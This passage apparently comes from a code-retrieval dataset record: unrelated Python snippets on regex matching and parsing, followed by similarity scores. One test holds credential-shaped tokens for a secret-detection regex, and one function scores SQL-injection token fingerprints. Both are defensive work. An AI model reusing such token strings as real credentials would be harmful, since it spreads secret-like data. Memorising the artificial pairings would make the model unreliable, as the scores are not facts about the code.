search_depth,\n skip_header, hexdump_unit, search_value, \n search_type, match_only, print_offset, verbose, no_newline,\n debug, hexdump, maxbytes, metadata,\n highlight_types=highlight_types,\n highlight_addresses=highlight_addresses,\n highlight_metadata=highlight_metadata,\n highlight_only=highlight_only,\n inuse=inuse, tcache=tcache, fast=fast, allow_invalid=allow_invalid,\n header_once=header_once, commands=commands,\n use_cache=True, # we enforced updating the cache once above so no need to do it for 
every chunk\n address_offset=address_offset\n )\n if chunks is not None and len(chunks) > 0:\n all_chunks.extend(chunks)\n if count_printed != None:\n count_printed -= len(chunks)\n header_once = None\n if count_printed == 0:\n break\n return all_chunks", "def getContentList(self, webcontent, index):\n try:\n repattern = re.compile(self.RegEx[index], re.IGNORECASE)\n foundlist = re.findall(repattern, webcontent)\n return foundlist\n except:\n self.postErrorMessage(self.ErrorMessage + \" \" + self.FullURL)\n return None", "def parseResult(self):\n\n # parse all WHYPO tags\n result = []\n for msg in [m for m in self.msg if \"WHYPO\" in m]:\n result.append({})\n\n for prop in self.pattern.findall(msg):\n key = prop.split(\"=\")[0]\n value = prop.split('\"')[1]\n\n if key == \"CM\":\n try:\n value = float(value)\n except:\n pass\n if key == \"CLASSID\":\n try:\n value = int(value)\n except:\n pass\n result[-1][key] = value\n\n return result", "def _get_matching_records(self, args, manifest) -> ty.List[dict]:\n if args.all:\n records = manifest._items # type: ty.List[dict]\n else:\n tags = dict(args.tag or [])\n try:\n records = [manifest.locate(args.type[0], **tags)]\n except exceptions.NoMatchingAsset:\n records = []\n return records", "def __getitem__(self, regexp, return_names=False):\r\n matches = self.grep_param_names(regexp)\r\n if len(matches):\r\n if return_names:\r\n return self._get_params()[matches], np.asarray(self._get_param_names())[matches].tolist()\r\n else:\r\n return self._get_params()[matches]\r\n else:\r\n raise AttributeError, \"no parameter matches %s\" % regexp", "def multi_parse(templates, text):\n for template in templates:\n parsed = parse(template, text)\n if parsed:\n return parsed\n\n raise ValueError(\n f\"'{text}' does not match any template: {templates}\")", "def search_dialog_group(log_info, logs, curr_idx):\n content = log_info['content']\n dialog = content['dialog']\n msg_type = content['msgType']\n\n search_target = None\n search_msg_type = None\n search_action_name = None\n search_action = None\n if msg_type.lower() == 'touchevent' and content['actionId'] == 0:\n # Touch down\n search_msg_type = msg_type\n search_action_name = 'actionId'\n search_action = 1\n search_target = dialog\n if msg_type.lower() == 'keyevent' and content['actionCode'] == 0:\n # Key down\n search_msg_type = msg_type\n search_action_name = 'actionCode'\n search_action = 1\n search_target = dialog\n\n if search_target is None:\n return None, curr_idx + 1\n \n # Search\n idx = curr_idx + 1\n while idx < len(logs):\n _log_info = extract_info(logs[idx])\n _content = _log_info['content']\n idx += 1\n\n if _log_info['tag'] == DIALOG_TAG and _content['msgType'] == search_msg_type and _content['dialog'] == search_target and _content[search_action_name] == search_action:\n return (curr_idx, idx-1, DIALOG_TAG, dialog, search_msg_type), idx\n\n return (curr_idx, curr_idx, DIALOG_TAG, dialog, search_msg_type), curr_idx + 1", "def test_multi_no_match_return_expr(self):\n eq_(None,line_no_matches_ngreps(self.line,[\"foo\",\"idontmatch\"]))", "def parse_gretchens_notes(email_payload: str\n ) -> Tuple[List[Activity], List[Nap]]:\n print('start parsing email')\n # TODO: Find a clever way to detect time zone\n time_zone = pytz.timezone('US/Eastern')\n\n payload = _remove_line_breaks(email_payload)\n\n # get document attributes\n child_name_re = re.search(\"class=\\\"heading-name\\\">(.*)'s Daily Note<\",\n payload)\n if child_name_re:\n child_name = child_name_re.group(1)\n else:\n raise 
ValueError(\"Could not find child's name\")\n\n date_re = re.search(\"class=\\\"heading-date\\\">(.*?)<\",\n payload)\n if date_re:\n date_str = re.sub('(rd|st|th|nd)', '', date_re.group(1))\n date_py = datetime.strptime(date_str, '%B %d, %Y')\n date = date_py.strftime('%Y-%m-%d')\n else:\n raise ValueError(\"Could not find date\")\n\n # get activities and notes\n act_split = payload.split('class=\"activity-middle activity-name\">')\n re_begin = re.compile(\"^(.*?)</td>\")\n re_result = re.compile(\"class=\\\"activity-middle activity-result\\\">\"\n \"(.*?)</td>\")\n re_note = re.compile(\"class=\\\"activity-middle activity-notes\\\">\"\n \"(.*?)</td>\")\n # (lower case) headings without time\n non_time_headings = ['note', 'supplies']\n activities = []\n for act_str in act_split[1:]:\n activity_name = re_begin.search(act_str).group(1)\n print('ACTIVITY:', activity_name)\n\n # remove out unwanted stuff\n act_str = re_begin.sub('', act_str)\n act_str = act_str.replace('</body></html>', '')\n\n if activity_name.lower() not in non_time_headings:\n\n act_sub_split = act_str.split(\n \"class=\\\"activity-left activity-time\\\">\"\n )\n for act_sub in act_sub_split[1:]:\n time_str = re_begin.search(act_sub).group(1)\n # parse this time\n py_time = datetime.strptime(time_str, '%I:%M%p')\n if date_py is None:\n e_str = 'Activity time found before date?'\n raise ValueError(e_str)\n activity_time = _make_iso_time(py_time,\n date_py,\n time_zone)\n print('Activity time:', activity_time)\n # result\n activity_result = re_result.search(act_sub).group(1)\n print('Activity result:', activity_result)\n activity_note_re = re_note.search(act_sub)\n if activity_note_re:\n activity_note = activity_note_re.group(1)\n print('Activity note:', activity_note)\n else:\n activity_note = None\n\n activities.append(Activity(first_name=child_name,\n date=date,\n activity=activity_name,\n datetime=activity_time,\n result=activity_result,\n notes=activity_note))\n\n else:\n # notes are split by result, not time\n act_sub_split = act_str.split(\n \"class=\\\"activity-middle activity-result\\\">\"\n )\n activity_time = None\n for act_sub in act_sub_split[1:]:\n activity_result = re_begin.search(act_sub).group(1)\n print('Note result:', activity_result)\n activity_note_re = re_note.search(act_sub)\n if activity_note_re:\n activity_note = activity_note_re.group(1)\n print('Note note:', activity_note)\n else:\n activity_note = None\n activities.append(Activity(first_name=child_name,\n date=date,\n activity=activity_name,\n datetime=activity_time,\n result=activity_result,\n notes=activity_note))\n\n print('---')\n\n # parse naps\n re_nap = re.compile('([0-9]+:[0-9]+ (AM|PM)) - ([0-9]+:[0-9]+ (AM|PM))')\n naps = []\n for act in activities:\n if act.activity.upper() == 'NAP':\n re_nap_search = re_nap.search(act.result)\n if re_nap_search is None:\n e_str = 'No nap time found in string: {}'.format(act.result)\n raise ValueError(e_str)\n nap_start, nap_end = re_nap_search.group(1), re_nap_search.group(3)\n nap_start_time = _make_iso_time(\n datetime.strptime(nap_start, '%I:%M %p'),\n date_py,\n time_zone\n )\n nap_end_time = _make_iso_time(\n datetime.strptime(nap_end, '%I:%M %p'),\n date_py,\n time_zone\n )\n naps.append(Nap(child_name,\n nap_start_time,\n nap_end_time))\n return activities, naps", "def Consume(cls, raw):\n assert cls.REGEX is not None, f\"{cls!r} expected to have REGEX attribute not None for {raw!r}\"\n # assert len(cls.CONTENT_RULES) != 0, f\"{cls!r} must have CONTENT_RULES set\"\n\n product = None\n post = 
None\n\n regexs = [cls.REGEX]if isinstance(cls.REGEX, list) is False else cls.REGEX\n\n for regex in regexs:\n match = regex.search(raw)\n\n if match is not None:\n\n match_start = match.start()\n match_end = match.end()\n product = cls(match.group(\"content\"), match_start, match_end)\n return raw, product\n else:\n return raw, None", "def parse_crypto_calls(message_text):\n string = message_text.split()\n if '!price' == string[0]:\n try:\n return (None, string[1])\n except IndexError:\n return (None, None)\n elif '!top' == string[0]:\n return (None, string[0])\n elif '!exit' == string[0]:\n return (None, string[0])\n elif '!ping' == string[0]:\n return (None, string[0])\n else:\n #the first group contains the username, the second group contains the maining message\n return (None, None)", "def _matching_closing_tags(self, offset, stack, matching):\n if not stack:\n return (stack, matching)\n last = stack[-1]\n if self.source_tags.closing_tags.get(offset,{}).get(last.begin,{}).get(last.name,False):\n stack.pop()\n matching.append(last)\n return self._matching_closing_tags(offset, stack, matching)\n else:\n return (stack, matching)", "def search_activity_group(log_info, logs, curr_idx):\n content = log_info['content']\n plid = log_info['plid']\n package = log_info['package']\n activity = content['activity']\n msg_type = content['msgType']\n\n search_target = None\n search_msg_type = None\n search_action_name = None\n search_action = None\n if msg_type.lower() == 'touchevent' and content['actionId'] == 0:\n # Touch down\n search_msg_type = msg_type\n search_action_name = 'actionId'\n search_action = 1\n search_target = activity\n down_time = content['downTime']\n if msg_type.lower() == 'keyevent' and content['actionCode'] == 0:\n # Key down\n search_msg_type = msg_type\n search_action_name = 'actionCode'\n search_action = 1\n search_target = activity\n down_time = content['downTime']\n\n if search_target is None:\n return None, curr_idx + 1\n\n # Search\n idx = curr_idx + 1\n return_idx = -1\n while idx < len(logs):\n _log_info = extract_info(logs[idx])\n _content = _log_info['content']\n idx += 1\n\n if _log_info['tag'] == ACTIVITY_TAG and _content['msgType'] == search_msg_type \\\n and _content['activity'] == search_target and _content[search_action_name] == search_action and _content['downTime'] == down_time:\n if return_idx == -1:\n return_idx = idx\n return (curr_idx, idx-1, ACTIVITY_TAG, activity, search_msg_type), return_idx\n\n if _log_info['tag'] == POPUPWINDOW_TAG:\n return_idx = idx - 1\n\n return (curr_idx, curr_idx, ACTIVITY_TAG, activity, search_msg_type), curr_idx + 1", "def process_match_result(self, match):\n raise NotImplementedError()", "def extract_element(element,default_tag_type='regular'):\r\n if element.tag == 'node':\r\n return extract_node(element,NODE_FIELDS,PROBLEMCHARS,default_tag_type)\r\n if element.tag == 'way':\r\n return extract_way(element,WAY_FIELDS,PROBLEMCHARS,default_tag_type)", "def test_type_result(self):\n result = self.parser.msg_analysis(MSG_TEST_NO_RESULT[0])\n assert isinstance(result, list)", "def _parse_line(line):\n\n for key, rx in rx_dict.items():\n match = rx.search(line)\n if match:\n return key, match\n # if there are no matches\n return None, None", "def _parse_line(line):\n\n for key, rx in rx_dict.items():\n match = rx.search(line)\n if match:\n return key, match\n # if there are no matches\n return None, None", "def nms_match(dets: array_like_type,\n iou_threshold: float) -> List[array_like_type]:\n if dets.shape[0] == 0:\n matched = 
[]\n else:\n assert dets.shape[-1] == 5, 'inputs dets.shape should be (N, 5), ' \\\n f'but get {dets.shape}'\n if isinstance(dets, Tensor):\n dets_t = dets.detach().cpu()\n else:\n dets_t = torch.from_numpy(dets)\n indata_list = [dets_t]\n indata_dict = {'iou_threshold': float(iou_threshold)}\n matched = ext_module.nms_match(*indata_list, **indata_dict)\n if torch.__version__ == 'parrots':\n matched = matched.tolist() # type: ignore\n\n if isinstance(dets, Tensor):\n return [dets.new_tensor(m, dtype=torch.long) for m in matched]\n else:\n return [np.array(m, dtype=int) for m in matched]", "def test_searchMessageSetWithStarFirst(self):\n return self._messageSetSearchTest('*:2', [2, 3, 4, 5])", "def test_multi_match_return_expr(self):\n eq_(self.line,line_matches_greps(self.line,[\"foo\",\"bar\"]))", "def getMatch(reMatch,group=0):\n if reMatch: return reMatch.group(group)\n else: return ''", "def SearchRePy20(context, pattern, arg=None):\n if not arg:\n arg = context.node\n arg = Conversions.StringValue(arg)\n proc = context.processor\n matches_nodeset = []\n _re =re.compile(pattern)\n _match =_re.search(arg)\n while _match:\n proc.pushResult()\n proc.writers[-1].startElement('Match', EMPTY_NAMESPACE)\n _groups =_match.groups()\n # .groups() return empty tuple when the pattern did not do grouping\n if not _groups: _groups =tuple(_match.group())\n for group in _groups:\n proc.writers[-1].startElement('Group', EMPTY_NAMESPACE)\n # MatchObject groups return None if unmatched\n # unlike .findall() returning empty strings\n proc.writers[-1].text(group or '')\n proc.writers[-1].endElement('Group')\n proc.writers[-1].endElement('Match')\n frag = proc.popResult()\n context.rtfs.append(frag)\n matches_nodeset.append(frag.childNodes[0])\n _match =_re.search(arg, _match.end())\n return matches_nodeset", "def optional(*patterns: Any) -> Any: # type: ignore\n strings: List[str] = []\n for pattern in each_string(*patterns):\n if not isinstance(pattern, AnnotatedStr):\n pattern = AnnotatedStr(pattern)\n pattern.optional = True\n strings.append(pattern)\n if len(patterns) == 1 and isinstance(patterns[0], str):\n assert len(strings) == 1\n return strings[0]\n return strings", "def skip(self, word_list, word_type):\n\n while self.peek(word_list) == word_type:\n self.match(word_list, word_type)", "def sieve_function(raw_data):\n matchers = []\n return_list = []\n\n matchers.append(SBE19DataParticle.regex_compiled())\n matchers.append(SBE19HardwareParticle.regex_compiled())\n matchers.append(SBE19CalibrationParticle.regex_compiled())\n matchers.append(SBE19StatusParticle.regex_compiled())\n matchers.append(SBE19ConfigurationParticle.regex_compiled())\n matchers.append(OptodeSettingsParticle.regex_compiled())\n\n for matcher in matchers:\n for match in matcher.finditer(raw_data):\n return_list.append((match.start(), match.end()))\n\n return return_list", "def match(self, *args):\n return _ida_hexrays.udc_filter_t_match(self, *args)", "def match(self, url):\n return list(\n {\n message\n for message in self.active()\n if message.is_global or message.match(url)\n }\n )", "def getResponse(body, skipPartial=True):\n # If there is a schmeckle value in body\n if p.search(body):\n if skipPartial and not any([q in body.lower() for q in question_indicators]):\n print(\"\\n------\\nPartial Match Skipped:\\n%s\\n------\\n\"%body)\n return None\n quote = getQuote(body)\n conversion, values = getConversion(body)\n\n # Combine into message\n msg = \"\\n\\n\".join(quote)\n msg += \"\\n\" + \"\\n\".join(conversion)\n msg += 
\"\\n---\\n\"\n msg += \"\\n[^(1 Schmeckle = $148 USD)](https://www.reddit.com/r/IAmA/comments/202owt/we_are_dan_harmon_and_justin_roiland_creators_of/cfzfv79)^( | price not guaranteed |) [^(`what is my purpose`)](https://github.com/Elucidation/schmeckle_bot 'convert Schmeckles to USD')\"\n return [quote, conversion, values, msg]\n\n return None", "def Consume(cls, raw):\n assert cls.REGEX is not None, f\"{cls!r} expected to have REGEX attribute not None for {raw!r}\"\n # assert len(cls.CONTENT_RULES) != 0, f\"{cls!r} must have CONTENT_RULES set\"\n\n product = None\n post = None\n\n regexs = [cls.REGEX]if isinstance(cls.REGEX, list) is False else cls.REGEX\n\n for regex in regexs:\n match = regex.search(raw)\n\n if match is not None:\n\n match_start = match.start(0)\n match_end = match.end(0)+1\n groups = match.groupdict()\n if \"content\" in groups:\n del groups['content']\n\n product = cls(match.group(1), match_start, match_end, **groups)\n return raw, product\n else:\n return raw, None", "def interpret(self, match):\n raise NotImplementedError()", "def find_next(lines, find_str, start_index):\n mode = None\n if isinstance(find_str, basestring):\n mode = 'normal'\n message = find_str\n elif isinstance(find_str, Invert):\n mode = 'invert'\n message = str(find_str)\n else:\n raise TypeError(\"Unsupported message type\")\n for i in range(start_index, len(lines)):\n if re.search(message, lines[i]):\n return mode == 'normal', i, lines[i]\n elif message in lines[i]:\n return mode == 'normal', i, lines[i]\n if mode == 'invert':\n return True, len(lines), None\n raise LookupError(\"Not found\")", "def match(parser):\n def run(parser, chunks, chunk, last):\n chunks = (chunk, chunks)\n result = parser.__parser__()(chunk, last)\n tupe, value = result\n if tupe & ParserResult.DONE:\n value, chunk, last = value\n match = _chunks_merge(chunks)[:-len(chunk)] if chunk else _chunks_merge(chunks)\n return ParserResult.from_done((match, value), chunk, last)\n elif tupe & ParserResult.PARTIAL:\n return ParserResult.from_partial(Parser(run, value, chunks))\n else:\n return result\n return Parser(run, parser, tuple())", "def split_match(self, match):\n match, line, col, error, warning, msg, _ = super().split_match(match)\n col_end = int(match.group(3))\n token_len = col_end - col\n return match, line, col, error, warning, msg, \".\" * token_len", "def parse(self):\n\t\tfor part in self.mail.walk():\n\t\t\tself.process_part(part)", "def subStringMatchExact(target,key):\r\n index = find(target,key)\r\n #print 'here',target,key,index\r\n if index < 0 or len(key) <= 0 or len(target) <= 0:\r\n return ()\r\n matches = subStringMatchExact(target[index+len(key):len(target)],key)\r\n offset = index + len(key)\r\n temp_matches = ()\r\n #print matches\r\n if matches:\r\n for x in range(0, len(matches)) :\r\n temp_matches += ((matches[x] + offset),)\r\n #matches.insert(0,index)\r\n temp_matches = (index,) + temp_matches\r\n return temp_matches", "def _MatchType2(self, command_task, extra_required_attrs):\n for group in six.itervalues(self._groups):\n matched_devices = self._MatchGroup(\n group,\n command_task.test_bench.host.groups[0],\n extra_required_attrs)\n if matched_devices:\n return matched_devices\n return None", "def parse_body(body):\n for line in body.lower().split(\"\\n\"):\n words = line.split()\n try:\n idx = words.index(\"re-run\")\n except ValueError:\n continue\n if words[idx + 1] == \"full\":\n yield words[idx : idx + 3]\n else:\n yield words[idx : idx + 2]", "def test_reversedSearchTerms(self):\n 
msgset = imap4.parseIdList(b'4:2')\n self.assertEqual(list(msgset), [2, 3, 4])", "def find_match(self, regex: str, blob: str, flags: re.RegexFlag = re.IGNORECASE,\n many: bool = False) -> Union[str, List[str], None]:\n if many:\n matches = re.findall(regex, blob, flags=flags)\n return [self._process(m) for m in matches if m]\n else:\n match = re.search(regex, blob, flags=flags)\n if match:\n return self._process(match.group(1))\n return None", "def get_command_match(\n command_list: List[Tuple[re.Match, callable]], message: str\n) -> Optional[Tuple[dict, callable]]:\n command = message.content # get the text in message\n\n match_list = map(lambda match: (match[0].match(command), match[1]), command_list)\n\n for command_patter, command_func in match_list:\n if command_patter:\n return command_patter.groupdict(), command_func\n\n return None", "def test_regex_matches_multiple_valid(self):\n token_1 = \"NDY3MjIzMjMwNjUwNzc3NjQx.XsyWGg.uFNEQPCc4ePwGh7egG8UicQssz8\"\n token_2 = \"NDcyMjY1OTQzMDYyNDEzMzMy.XsyWMw.l8XPnDqb0lp-EiQ2g_0xVFT1pyc\"\n message = f\"garbage {token_1} hello {token_2} world\"\n\n results = token_remover.TOKEN_RE.finditer(message)\n results = [match[0] for match in results]\n self.assertCountEqual((token_1, token_2), results)" ]
[ "0.5471574", "0.52397555", "0.5145322", "0.5005529", "0.49990287", "0.49739963", "0.49577978", "0.49357885", "0.49001318", "0.48870462", "0.48827666", "0.4872868", "0.48422822", "0.48398778", "0.48214757", "0.4820572", "0.48020837", "0.47951323", "0.4777706", "0.4765019", "0.4747468", "0.47409493", "0.4740511", "0.47404638", "0.47373354", "0.47322333", "0.47295514", "0.47075036", "0.47044677", "0.4700549", "0.46925032", "0.4683527", "0.4683198", "0.4674361", "0.46496242", "0.46379036", "0.46376717", "0.4636181", "0.4622107", "0.46211895", "0.46192685", "0.46177813", "0.4617687", "0.46163598", "0.46132362", "0.46130025", "0.46069217", "0.4590609", "0.45872813", "0.45872813", "0.4582075", "0.45715886", "0.45645368", "0.45617384", "0.4550187", "0.4532894", "0.45253974", "0.45211515", "0.45209426", "0.4502205", "0.45012712", "0.44990402", "0.44978875", "0.44976088", "0.44943747", "0.4491624", "0.4478749", "0.44781217", "0.44527987", "0.44496685", "0.44469097", "0.44463122", "0.4443633", "0.44410247", "0.44355556", "0.44355556", "0.4432875", "0.44208455", "0.44176337", "0.44160047", "0.44150707", "0.44119987", "0.44088104", "0.44012544", "0.43956771", "0.43950093", "0.4394349", "0.43878683", "0.4384164", "0.4378155", "0.43768305", "0.43751824", "0.43722433", "0.43721724", "0.43612745", "0.4354767", "0.43530428", "0.4351609", "0.43475646", "0.43464246" ]
0.5920306
0
Return True if the parameters match the parse_type. match is the pattern of parse_type elements you want to search for; for example, you can write "www" to check for 3 words in a row. ranges follows the same syntax as occurrences, except that it targets indexes.
def checker(self, match="xw", ranges="0,1", in_a_row=True, reverse=False):
    length = len(self.parse_type)
    if ranges is not None:
        ranges = str(ranges)
        index_array = self.indexes(ranges)
    else:
        # no ranges supplied: fall back to every index
        # (the original left index_array unset in this case)
        index_array = list(range(length))
    substring = ""
    # walk parse_type forward, or backward when reverse is truthy
    for idx in range(length*reverse-reverse, length*(-reverse+1)-reverse, (-reverse)*2+1):
        if idx in index_array:
            substring += self.parse_type[idx]
    if in_a_row is True:
        # the whole pattern must appear as one contiguous run
        return match in substring
    if in_a_row is False:
        # the pattern characters must appear in order, gaps allowed
        # (the original compared against an undefined `maxi`; a full match
        # is assumed to mean every character of `match` was found in order)
        target = 0
        for i in substring:
            if target < len(match) and match[target] == i:
                target += 1
        return target == len(match)
    if in_a_row is None:
        # every character of match must occur somewhere in parse_type,
        # in any order
        for i in self.parse_type:
            if i in match:
                match = match.replace(i, '', 1)
        return match == ""
    return None
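A minimal usage sketch of the method above, under stated assumptions: the host class, its parse_type string (e.g. "xwww"), and the `indexes` helper are not shown in this record, so the `ParsedLine` class and its simplified `indexes` stand-in below are hypothetical illustrations, not the real implementation.

# assumes `checker` above is available as a module-level function
class ParsedLine:
    def __init__(self, parse_type):
        self.parse_type = parse_type

    def indexes(self, ranges):
        # simplified stand-in: "0,1" -> [0, 1]
        return [int(i) for i in ranges.split(",")]

ParsedLine.checker = checker  # attach the method shown above

line = ParsedLine("xwww")
print(line.checker(match="ww", ranges="1,2", in_a_row=True))   # True: 'w' at indexes 1 and 2
print(line.checker(match="www", ranges="0,1", in_a_row=True))  # False: only indexes 0 and 1 are kept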
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _match(self, *token_types):\n for token in token_types:\n if self._check(token):\n self._advance()\n return True\n\n return False", "def _multiindex_row_in(cls, row, parse_list, start=None, stop=None):\n\n row_sub = row[start:stop]\n for tokens in parse_list:\n\n # A single row will never match an empty token list:\n if not tokens:\n continue\n\n # Check whether all of the entries in `row_sub` match some list of\n # tokens. If this loop terminates prematurely because of a mismatch\n # between `row_sub` and some list of tokens in `parse_list`, it will\n # not return True; this forces checking of the subsequent token\n # lists:\n for i, token in enumerate(tokens):\n\n # '*' matches everything:\n if token == '*':\n continue\n\n # Integers and strings must match exactly:\n elif isinstance(token, (int, long, basestring)):\n if row_sub[i] != token:\n break\n\n # Tokens must be in a set of values:\n elif type(token) == list:\n if row_sub[i] not in token:\n break\n\n # Token must be within range of an interval:\n elif type(token) == slice:\n i_start = token.start\n i_stop = token.stop\n\n # Handle intervals with ambiguous start or stop values:\n if (i_start is not None and row_sub[i] < i_start) or \\\n (i_stop is not None and row_sub[i] >= i_stop):\n break\n else:\n continue\n else:\n return True\n\n # If the function still hasn't returned, no match was found:\n return False", "def _index_row_in(cls, row, parse_list):\n\n # Since `row` is a scalar, it need only match the sole entry of one of\n # the lists in `parse_list`:\n for tokens in parse_list:\n if not tokens:\n continue\n if len(tokens) > 1:\n raise ValueError('index row only is scalar')\n if tokens[0] == '*':\n return True\n elif isinstance(tokens[0], (int, long, basestring)):\n if row == tokens[0]:\n return True\n elif type(tokens[0]) == list:\n if row in tokens[0]:\n return True\n elif type(tokens[0]) == slice:\n i_start = tokens[0].start\n i_stop = tokens[0].stop\n if (i_start is None or row >= i_start) and \\\n (i_stop is None or row < i_stop):\n return True\n else:\n continue\n return False", "def match(self, *ial):\n for b, c in ial:\n assert len(b) == len(c), \"parameter length mismatch\"\n if self._.d != len(b):\n continue\n if len(self._match(b, c)) > 0:\n return True\n return False", "def IsValidInputType(self, list_of_matches):\n for entry in list_of_matches:\n if not entry:\n return False\n\n return True", "def match(self) -> bool:", "def matches(inline,groupby,groupvals):\n for i,m in enumerate(groupby):\n if inline[m] == groupvals[i]:\n continue\n else:\n return False\n return True", "def match(self, name, tags):\n or_exprs, tags = self.get_compiled(name, tags)\n \n # or_exprs = [{'a'}, {'c'}, {'d', 'a'}, {'d', 'e'}]\n return any(and_expr <= tags for and_expr in or_exprs)", "def matches(self, python):\n return False", "def test(types, _):\n return 'Date' in types and 'Postal Code' in types", "def match(self, data):\n # self.logger.debug('Running yara, nlp against data')\n # malicious = self._rules.match(data=data)\n # md5 = hashlib.md5(data).hexdigest()\n # if malicious:\n # for match in malicious:\n # self.logger.info('Match found; Rule: \\'%s\\';'\n # 'Namespace: \\'%s\\'; MD5: %s' %\n # (match.rule, match.namespace, md5))\n\n # return True\n \n cnt_name = 0\n cnt_dob = 0\n cnt_acc = 0\n cnt_email = 0\n cnt_line = 0\n\n for line in data: \n cnt_name += self.humanName(line)\n cnt_dob += self.dob(line)\n cnt_acc += self.account_phone(line)\n cnt_email += self.email(line)\n cnt_line += 1\n\n sum = cnt_name + cnt_dob + 
cnt_acc + cnt_email\n if sum > 100 or sum > cnt_line:\n return True\n else:\n return False\n return False", "def matches(self, test_string, parse_all=True):\n try:\n self.parse_string(text(test_string), parse_all=parse_all)\n return True\n except ParseException:\n return False", "def filt(item):\n result = (((item.done and opt.list_complete) or\n (not item.done and not opt.hide_incomplete)) and\n ((item.time is None) or\n ((opt.start_date is None or opt.start_date < item.time) and\n item.time < opt.end_date)))\n for arg in args:\n result = result and (re.search(arg, item.text) != None)\n return result", "def is_valid(teorema, args):\n if args.ignore_case:\n for value in teorema.values():\n if args.pattern.lower() in value.lower():\n return True\n else:\n for value in teorema.values():\n if args.pattern in value:\n return True\n\n return False", "def _block_matches_all(block_data):\n # do the checks which don't require loading any additional data\n if (\n self._block_matches(block_data, qualifiers) and\n self._block_matches(block_data.fields, settings)\n ):\n if content:\n definition_block = self.get_definition(course_locator, block_data.definition)\n return self._block_matches(definition_block['fields'], content)\n else:\n return True", "def _match_entry_type(self, code_entry, type_tuple):\n matched = False\n if self.loading_from_file:\n type_list = []\n for elem in type_tuple:\n type_list.append(str(elem))\n matched = self._match_entry_type_string(code_entry, type_list)\n else:\n matched = self._match_entry_type_tuple(code_entry, type_tuple)\n return matched", "def test_multi_match_return_expr(self):\n eq_(self.line,line_matches_greps(self.line,[\"foo\",\"bar\"]))", "def route_match(self):\n if self.whole_word_var.get():\n self.whole_word_matches()\n else:\n self.partial_word_matches()", "def route_match(self):\n if self.whole_word_var.get():\n self.whole_word_matches()\n else:\n self.partial_word_matches()", "def _match_array(tipo, array):\n\n return bool(re.match(array, tipo))", "def valid_retag_params(self) -> bool:\n if not (self.action[0] == Actions.RETAG.value):\n return False\n pairs = self.action[1].split(\",\")\n for pair in pairs:\n if not self.correct_retag_pair(pair):\n return False\n return True", "def _match_entry_type_tuple(code_entry, type_tuple):\n entry_type = code_entry['type']\n return entry_type in type_tuple", "def matches(self):\n pass", "def _validate_speech_acts_section(\n protocol_specification: ProtocolSpecification,\n) -> Tuple[bool, str, Optional[Set[str]], Optional[Set[str]]]:\n custom_types_set = set()\n performatives_set = set()\n\n content_names_types: Dict[str, Tuple[str, str]] = {}\n\n # check that speech-acts definition is not empty\n if len(protocol_specification.speech_acts.read_all()) == 0:\n return (\n False,\n \"Speech-acts cannot be empty!\",\n None,\n None,\n )\n\n for (\n performative,\n speech_act_content_config,\n ) in protocol_specification.speech_acts.read_all():\n\n # Validate performative name\n (\n result_performative_validation,\n msg_performative_validation,\n ) = _validate_performatives(performative)\n if not result_performative_validation:\n return (\n result_performative_validation,\n msg_performative_validation,\n None,\n None,\n )\n\n performatives_set.add(performative)\n\n for content_name, content_type in speech_act_content_config.args.items():\n\n # Validate content name\n (\n result_content_name_validation,\n msg_content_name_validation,\n ) = _validate_content_name(content_name, performative)\n if not 
result_content_name_validation:\n return (\n result_content_name_validation,\n msg_content_name_validation,\n None,\n None,\n )\n\n # check type of content_type\n if not isinstance(content_type, str):\n return (\n False,\n \"Invalid type for '{}'. Expected str. Found {}.\".format(\n content_name, type(content_type)\n ),\n None,\n None,\n )\n\n # Validate content type\n (\n result_content_type_validation,\n msg_content_type_validation,\n ) = _validate_content_type(content_type, content_name, performative)\n if not result_content_type_validation:\n return (\n result_content_type_validation,\n msg_content_type_validation,\n None,\n None,\n )\n\n # check content name isn't repeated with a different type\n if content_name in content_names_types:\n last_performative = content_names_types[content_name][0]\n last_content_type = content_names_types[content_name][1]\n if last_content_type != content_type:\n return (\n False,\n \"Content '{}' with type '{}' under performative '{}' is already defined under performative '{}' with a different type ('{}').\".format(\n content_name,\n content_type,\n performative,\n last_performative,\n last_content_type,\n ),\n None,\n None,\n )\n\n content_names_types[content_name] = (performative, content_type)\n\n for sub_type in (\n list(_get_sub_types_of_compositional_types(content_type))\n if _is_compositional_type(content_type)\n else []\n ) + [content_type]:\n if _is_valid_ct(sub_type):\n custom_types_set.add(sub_type.strip())\n\n return True, \"Speech-acts are valid.\", performatives_set, custom_types_set", "def validate(self, s):\n if len(s) == 0:\n return False\n if s in self.whitelist:\n return True\n if s in self.blacklist:\n return False\n\n # SQL Types are rarely used\n if 't' in s and 'f(t' not in s and 'At' not in s:\n return False\n\n if '1nf' in s:\n return False\n if 's1o' in s:\n return False\n if 'oo' in s:\n return False\n if 'v,s' in s:\n return False\n if 's,v' in s:\n return False\n if 'v,v' in s:\n return False\n if 'v,1' in s:\n return False\n if 'v,n' in s:\n return False\n if 'n,v' in s:\n return False\n if '1,v' in s:\n return False\n if 'Eo(' in s:\n return False\n if '(o(' in s:\n return False\n if '(o1' in s:\n return False\n if '(on' in s:\n return False\n if '(os' in s:\n return False\n if '(of' in s:\n return False\n if '(ov' in s:\n return False\n if 'B(n)' in s:\n return False\n if 'oso' in s:\n return False\n if 'o1o' in s:\n return False\n if 'ono' in s:\n return False\n\n # only 1 special case for this\n # 1;foo:goto foo\n # 1;n:k\n # the 'foo' can only be a 'n' type\n if ':' in s and not 'n:' in s:\n return False\n\n if '11' in s:\n return False\n\n if '))' in s:\n return False\n if '((' in s:\n return False\n if 'v1' in s:\n return False\n\n if 'nv' in s and ';T' not in s:\n return False\n if 'nn' in s and ';T' not in s:\n return False\n\n # select @version foo is legit\n # but unlikely anywhere else\n if 'vn' in s and 'Evn' not in s:\n return False\n\n if 'oE' in s:\n return False\n\n if 'A1' in s:\n return False\n if 'An' in s:\n return False\n if 'A(1' in s:\n return False\n\n if 'vov' in s:\n return False\n if 'vo1' in s:\n return False\n if 'von' in s:\n return False\n\n if 'ns' in s:\n if 'U' in s:\n return True\n if 'T' in s:\n return True\n return False\n\n if 'sn' in s:\n # that is... 
